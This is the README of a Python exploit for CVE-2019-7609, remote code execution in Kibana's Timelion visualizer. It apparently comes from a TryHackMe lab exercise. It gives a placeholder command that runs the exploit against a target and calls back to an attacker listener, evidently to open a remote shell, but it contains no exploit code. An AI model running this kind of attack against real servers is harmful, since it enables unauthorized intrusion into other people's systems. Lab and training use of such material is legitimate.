Exploit for CVE-2019-7609, written in Python 3.6+
and based on the code by LandGrey.
CVE-2019-7609: RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizer.
- Start a listener
- Run the exploit with the target URL (base URL of the Kibana server), the listener host address and the listener port as arguments:
    ./cve-2019-7609.py http://<target>:5601 <listener-ip> <listener-port>
- Enjoy RCE
Tested on the Kiba room on TryHackMe.